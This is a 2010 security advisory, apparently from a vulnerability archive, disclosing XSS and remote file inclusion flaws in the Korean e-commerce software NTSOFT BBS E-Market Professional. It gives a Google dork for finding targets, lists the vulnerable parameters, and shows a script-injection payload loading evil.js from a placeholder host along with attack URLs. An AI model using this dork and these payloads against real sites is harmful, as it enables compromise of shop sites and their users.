Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24174
HistoryJul 07, 2010 - 12:00 a.m.

NTSOFT BBS E-Market Professional = XSS / Remote Execution Code

2010-07-0700:00:00
vulners.com
170

+================================================================================================+

  •             NTSOFT BBS E-Market Professional  & XSS and Remote Execution Evil
    

code +
+================================================================================================+

Author(s): Ivan Sanchez

Product: NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/

Date: 03/07/2010

"most off all korean sites that handle e-shop , e-banking,… use this software"

Description:

BBS E-Market Professional is a Korean Web based e-commerce application implemented
in PHP.

BBS E-Market Professional is reported to be affected by a remote file include
vulnerability that may allow an attacker to include malicious files containing
arbitrary code to be executed on a vulnerable system.
The issue presents itself due to improper validation of user-supplied data.

During 2009, I reported some bugs:

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt

http://www.securityfocus.com/bid/35893

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152

http://xforce.iss.net/xforce/xfdb/52157

http://secunia.com/advisories/26117

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html

GOOGLE DORKS:

intext: "NTSOFT All rights reserved"

Parameters affected:


2010:

pageurl= evil.js
co_no= evil.js
b_temcode= evil.js

2009:

page= evil.js
bt_code= evil.js
b_no= evil.js

Evil Code to put:

Example: "><script src=http://site/scripts/evil.js&gt;&lt;/script&gt;

Example URl affected:

2009:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code

2010:

http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE

http://TARGET/becommunity/community/index.php?pageurl=board&amp;mode=comment_del&amp;co_no=93809&amp;b_no=434&amp;bt_code=17&amp;page=1&amp;flg=3&amp;co_no=EVIL_CODE

http://TARGET/becommunity/community/index.php?pageurl=board&amp;mode=comment_del&amp;co_no=105580&amp;b_no=5231&amp;b_temcode=19&amp;page=7&amp;flg=EVIL_CODE
&co_no=105580

http://TARGET/becommunity/community/index.php?pageurl=board&amp;mode=comment_del&amp;co_no=105580&amp;b_no=5231&amp;b_temcode=EVIL_CODEE&amp;page=7&amp;flg=3&amp;co_no=105580

Thank you so Much! Ivan,

NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+================================================================================================+

  •              NTSOFT BBS E-Market Professional &amp; XSS and Remote Execution Evil
    

code +
+================================================================================================+

Related for SECURITYVULNS:DOC:24174